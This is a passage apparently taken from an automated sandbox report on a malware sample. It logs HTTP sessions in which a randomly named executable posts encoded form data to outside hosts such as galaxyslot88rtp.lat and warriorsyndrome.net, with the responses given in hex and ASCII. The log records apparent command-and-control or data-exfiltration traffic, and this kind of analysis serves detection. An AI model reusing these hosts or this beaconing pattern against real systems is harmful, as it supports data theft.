                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 69 34 66 54 62 56 3d 56 51 32 37 33 50 6f 72 39 74 5a 4e 58 63 70 6e 42 6a 48 79 65 72 48 66 50 68 33 49 75 59 33 53 38 65 4c 32 32 2f 66 75 73 6f 35 64 42 64 50 59 4d 6f 45 57 47 65 64 36 2b 62 46 78 4f 35 43 39 4c 59 53 2f 70 79 76 75 56 4b 57 4b 55 52 51 36 5a 61 71 49 62 67 4c 44 33 46 64 4f 71 54 68 66 69 70 4a 53 4d 70 6f 70 38 58 54 37 33 74 67 4f 4a 58 2f 65 76 6c 42 66 5a 4a 71 70 73 75 63 6a 61 74 6e 48 33 49 63 3d 26 61 7a 71 3d 66 64 4b 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?i4fTbV=VQ273Por9tZNXcpnBjHyerHfPh3IuY3S8eL22/fuso5dBdPYMoEWGed6+bFxO5C9LYS/pyvuVKWKURQ6ZaqIbgLD3FdOqThfipJSMpop8XT73tgOJX/evlBfZJqpsucjatnH3Ic=&azq=fdKL"}</script></head></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.64974446.17.172.49804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:28.018125057 CEST704OUTPOST /lbpf/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.galaxyslot88rtp.lat
                                                                Origin: http://www.galaxyslot88rtp.lat
                                                                Referer: http://www.galaxyslot88rtp.lat/lbpf/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 42 38 72 2f 76 30 50 66 5a 6d 43 5a 48 5a 46 58 79 33 74 42 77 6d 48 59 57 4f 30 62 68 62 67 2b 63 6e 54 6b 44 46 31 55 75 6a 43 46 76 66 67 71 73 78 2f 6d 63 59 73 57 59 2b 43 34 39 57 52 65 38 6e 43 71 4d 61 47 72 39 65 7a 79 53 62 42 6c 57 31 4b 78 37 2f 57 41 59 73 4c 37 5a 31 68 66 78 58 71 51 4c 65 50 47 50 34 76 2f 68 30 45 43 6a 47 74 2f 50 54 43 36 4c 77 4e 59 67 44 57 6b 4e 6c 77 4b 79 78 53 52 53 6d 68 54 46 36 39 76 45 77 4b 49 4f 53 45 4d 61 69 46 6a 5a 55 4c 46 7a 53 62 2f 53 67 4d 6f 30 6b 72 67 70 52 72 53 53 58 62 54 63 56 42 41 35 69 75 45 4e 6c 6e 66 67 37 4d 6c 4d 67 4f 74 43 68 56 62
                                                                Data Ascii: i4fTbV=B8r/v0PfZmCZHZFXy3tBwmHYWO0bhbg+cnTkDF1UujCFvfgqsx/mcYsWY+C49WRe8nCqMaGr9ezySbBlW1Kx7/WAYsL7Z1hfxXqQLePGP4v/h0ECjGt/PTC6LwNYgDWkNlwKyxSRSmhTF69vEwKIOSEMaiFjZULFzSb/SgMo0krgpRrSSXbTcVBA5iuENlnfg7MlMgOtChVb


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.64974546.17.172.49804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:30.580266953 CEST728OUTPOST /lbpf/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.galaxyslot88rtp.lat
                                                                Origin: http://www.galaxyslot88rtp.lat
                                                                Referer: http://www.galaxyslot88rtp.lat/lbpf/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 42 38 72 2f 76 30 50 66 5a 6d 43 5a 46 35 31 58 2b 30 46 42 32 47 48 66 61 75 30 62 6f 37 67 36 63 6e 58 6b 44 45 68 45 75 51 6d 46 6f 39 34 71 74 77 2f 6d 62 59 73 57 57 65 43 78 77 32 52 56 38 6e 4f 59 4d 65 47 72 39 65 6e 79 53 61 78 6c 56 47 53 32 37 76 57 43 42 38 4c 35 57 56 68 66 78 58 71 51 4c 65 79 52 50 34 6e 2f 68 67 34 43 73 48 74 38 54 6a 43 35 62 67 4e 59 32 7a 57 34 4e 6c 78 6e 79 30 79 33 53 6b 70 54 46 34 6c 76 45 6c 71 4c 48 53 45 4b 48 53 45 69 5a 31 53 55 2b 67 6d 6f 4d 51 55 35 68 45 6d 46 68 48 71 49 4f 6b 62 77 4f 46 68 43 35 67 32 32 4e 46 6e 31 69 37 30 6c 65 33 43 4b 4e 56 77 34 63 33 6e 39 61 73 49 62 4f 39 39 57 70 58 71 51 42 39 58 4f 69 41 3d 3d
                                                                Data Ascii: i4fTbV=B8r/v0PfZmCZF51X+0FB2GHfau0bo7g6cnXkDEhEuQmFo94qtw/mbYsWWeCxw2RV8nOYMeGr9enySaxlVGS27vWCB8L5WVhfxXqQLeyRP4n/hg4CsHt8TjC5bgNY2zW4Nlxny0y3SkpTF4lvElqLHSEKHSEiZ1SU+gmoMQU5hEmFhHqIOkbwOFhC5g22NFn1i70le3CKNVw4c3n9asIbO99WpXqQB9XOiA==
                                                                Sep 22, 2024 17:42:31.547988892 CEST1236INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 1251
                                                                date: Sun, 22 Sep 2024 15:42:31 GMT
                                                                server: LiteSpeed
                                                                platform: hostinger
                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                x-xss-protection: 1; mode=block
                                                                x-content-type-options: nosniff
                                                                vary: User-Agent
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                Sep 22, 2024 17:42:31.548017979 CEST431INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78
                                                                Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.64974646.17.172.49804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:33.132479906 CEST1741OUTPOST /lbpf/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.galaxyslot88rtp.lat
                                                                Origin: http://www.galaxyslot88rtp.lat
                                                                Referer: http://www.galaxyslot88rtp.lat/lbpf/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 42 38 72 2f 76 30 50 66 5a 6d 43 5a 46 35 31 58 2b 30 46 42 32 47 48 66 61 75 30 62 6f 37 67 36 63 6e 58 6b 44 45 68 45 75 51 75 46 76 49 73 71 73 58 72 6d 61 59 73 57 49 4f 43 38 77 32 52 49 38 6e 47 6d 4d 65 44 65 39 64 66 79 53 35 35 6c 64 54 2b 32 75 66 57 43 63 73 4c 36 5a 31 68 47 78 58 37 5a 4c 65 43 52 50 34 6e 2f 68 68 6f 43 72 57 74 38 41 7a 43 36 4c 77 4e 55 67 44 57 63 4e 68 6b 53 79 30 32 42 53 56 4a 54 46 59 31 76 47 52 4b 4c 49 53 45 49 58 43 46 78 5a 31 76 4d 2b 6b 47 6b 4d 54 49 58 68 44 75 46 77 42 2f 2b 54 33 44 71 61 6e 70 56 69 77 53 6a 4e 51 75 44 67 62 73 4c 54 58 7a 38 48 6e 45 32 53 51 37 36 54 76 6c 6b 4c 38 42 4d 75 48 50 61 43 2b 69 32 38 4d 66 78 61 6a 7a 56 5a 62 43 79 61 42 73 72 33 61 4a 71 63 4e 66 6e 76 75 38 53 34 61 2f 55 35 77 53 62 56 4a 76 62 62 66 70 36 71 6e 71 49 78 48 79 6c 65 31 37 68 59 34 69 6b 77 67 38 4c 44 54 6a 44 74 63 34 73 4b 53 4a 68 65 34 36 42 52 70 65 32 31 6c 6d 6c 41 62 76 6f 68 67 71 4a 43 39 46 4e 49 33 69 36 34 57 30 [TRUNCATED]
                                                                Data Ascii: i4fTbV=B8r/v0PfZmCZF51X+0FB2GHfau0bo7g6cnXkDEhEuQuFvIsqsXrmaYsWIOC8w2RI8nGmMeDe9dfyS55ldT+2ufWCcsL6Z1hGxX7ZLeCRP4n/hhoCrWt8AzC6LwNUgDWcNhkSy02BSVJTFY1vGRKLISEIXCFxZ1vM+kGkMTIXhDuFwB/+T3DqanpViwSjNQuDgbsLTXz8HnE2SQ76TvlkL8BMuHPaC+i28MfxajzVZbCyaBsr3aJqcNfnvu8S4a/U5wSbVJvbbfp6qnqIxHyle17hY4ikwg8LDTjDtc4sKSJhe46BRpe21lmlAbvohgqJC9FNI3i64W0sWdXEvYVifavaKYiqhekqqHro8++BV8EU8by6e5ZGulpnsOqOyCQJrsIQSWG11cq8+sDJ2PIi++7ADgc4zQSG6E8mYv1DC1T55sVYa5Km9iYG8/LhIaW4IZr3EC7TD8d7OZu/auWBA+6auHe6+KcLuy6qMJ7dvsqMJuZujIVkeUnlLjKjzS7Cp25O2E3XmPEvo3CRxp5lWNsd+KUrS+TyJz3CHacnLH6r4wGWwRimhvg3TxihYM4Iu+touAHhB7951mFVyKWnLEvMgs3zyInlIrFxUtTN1AhxNU9yu0ijC2e4fH3X/AHUWRiyUGnO1nm4qTfu7O5XuMTZ/+PUDTrwb2oJp3grjaYUfErXN1C5JXFXP2nNzKCujOfaI2L1HuGD9Yhi0bwCUYQ5TzBmfQmMRQ7+Ol/SHdbEn3KZoFL7yU2l6IZxw9y55YFhWPX64vvuK8GmuTlXxyyc9+5qUyxjENey0k54SPC/7gD16qnV4nZMKWUd+t3uvf+4lDQk7E/4xPdUHmTyHacprRvUjHc1Lrnw/k/vske1cnDGR9aTzVl7p5stzXH8P+I5pJO8p5eVBrs5f6dwGo6XUF4RM3S6KxDfrXuK9QUaFLy11SaRb5ujbyZYDp4jedCiTVN5FLA46KBmtXa0FYZAL8VLJszMpRj79FXA/Mtp7 [TRUNCATED]
                                                                Sep 22, 2024 17:42:34.093350887 CEST1236INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 1251
                                                                date: Sun, 22 Sep 2024 15:42:33 GMT
                                                                server: LiteSpeed
                                                                platform: hostinger
                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                x-xss-protection: 1; mode=block
                                                                x-content-type-options: nosniff
                                                                vary: User-Agent
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                Sep 22, 2024 17:42:34.093435049 CEST431INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78
                                                                Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.64974746.17.172.49804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:35.671866894 CEST427OUTGET /lbpf/?azq=fdKL&i4fTbV=M+DfsBvEIkyOAb10y0dA+UDjYbUtqrwEKADScmdz2U7nr/YOsALJT64KSPaG4zh33A22H+qXr8/USoZXKjK96Mq7ReyrRgsD03neHbuXRNiEyhMf3k5eUDWFdm02mW+aOnIw8Rk= HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.galaxyslot88rtp.lat
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:42:37.125828981 CEST1236INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 1251
                                                                date: Sun, 22 Sep 2024 15:42:36 GMT
                                                                server: LiteSpeed
                                                                platform: hostinger
                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                x-xss-protection: 1; mode=block
                                                                x-content-type-options: nosniff
                                                                vary: User-Agent
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                Sep 22, 2024 17:42:37.125852108 CEST431INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78
                                                                Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.6497483.33.130.190804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:42.456343889 CEST704OUTPOST /kzas/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.warriorsyndrome.net
                                                                Origin: http://www.warriorsyndrome.net
                                                                Referer: http://www.warriorsyndrome.net/kzas/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6d 61 76 51 30 4f 34 37 4a 32 68 48 2f 54 35 6c 6f 42 57 61 59 6b 6f 49 57 55 50 53 74 31 6a 65 6a 44 7a 76 31 49 62 6c 33 4c 4f 2f 4f 50 68 2f 76 4c 57 55 79 46 32 46 4a 74 54 4a 2b 5a 36 4a 75 44 57 49 6b 48 4e 61 54 69 69 2b 6a 4f 61 78 58 52 73 77 48 56 30 56 32 4a 69 46 75 39 49 5a 4c 57 45 72 61 49 65 78 2b 59 58 49 71 67 55 38 33 54 66 32 36 4d 6b 58 46 74 72 66 50 5a 34 73 30 6c 35 43 2b 4c 30 4a 78 63 51 69 4b 78 38 76 47 76 67 52 47 32 47 75 61 4b 4b 4d 56 2f 46 7a 6b 31 42 43 31 66 6c 38 79 4b 32 74 58 4c 4b 74 56 78 53 51 37 62 53 30 2b 42 4b 54 51 73 66 39 7a 34 47 66 72 6a 69 33 38 6a 77 31
                                                                Data Ascii: i4fTbV=mavQ0O47J2hH/T5loBWaYkoIWUPSt1jejDzv1Ibl3LO/OPh/vLWUyF2FJtTJ+Z6JuDWIkHNaTii+jOaxXRswHV0V2JiFu9IZLWEraIex+YXIqgU83Tf26MkXFtrfPZ4s0l5C+L0JxcQiKx8vGvgRG2GuaKKMV/Fzk1BC1fl8yK2tXLKtVxSQ7bS0+BKTQsf9z4Gfrji38jw1


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.6497493.33.130.190804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:45.005708933 CEST728OUTPOST /kzas/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.warriorsyndrome.net
                                                                Origin: http://www.warriorsyndrome.net
                                                                Referer: http://www.warriorsyndrome.net/kzas/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6d 61 76 51 30 4f 34 37 4a 32 68 48 77 54 4a 6c 74 69 2b 61 65 45 6f 48 54 55 50 53 33 46 6a 53 6a 44 2f 76 31 4a 76 31 33 2b 6d 2f 4f 71 4e 2f 6f 4b 57 55 7a 46 32 46 43 4e 53 4e 6a 70 36 57 75 44 61 41 6b 44 46 61 54 6d 4b 2b 6a 4c 32 78 58 67 73 7a 57 56 30 54 35 70 69 4c 68 64 49 5a 4c 57 45 72 61 49 61 62 2b 59 50 49 72 54 38 38 34 53 66 78 35 4d 6b 55 52 39 72 66 65 70 34 6f 30 6c 34 6c 2b 4b 6f 6e 78 59 67 69 4b 7a 30 76 47 63 34 65 66 6d 47 73 65 4b 4b 64 54 39 74 38 70 6d 59 6c 71 4d 6b 65 68 34 65 38 66 64 4c 33 4a 43 53 7a 70 4c 79 32 2b 44 53 68 51 4d 66 58 78 34 2b 66 35 30 75 51 7a 58 56 57 4d 49 6c 6b 58 6e 43 38 62 71 63 67 38 34 33 54 75 79 61 4e 39 51 3d 3d
                                                                Data Ascii: i4fTbV=mavQ0O47J2hHwTJlti+aeEoHTUPS3FjSjD/v1Jv13+m/OqN/oKWUzF2FCNSNjp6WuDaAkDFaTmK+jL2xXgszWV0T5piLhdIZLWEraIab+YPIrT884Sfx5MkUR9rfep4o0l4l+KonxYgiKz0vGc4efmGseKKdT9t8pmYlqMkeh4e8fdL3JCSzpLy2+DShQMfXx4+f50uQzXVWMIlkXnC8bqcg843TuyaN9Q==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.6497503.33.130.190804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:42:47.565902948 CEST1741OUTPOST /kzas/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.warriorsyndrome.net
                                                                Origin: http://www.warriorsyndrome.net
                                                                Referer: http://www.warriorsyndrome.net/kzas/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
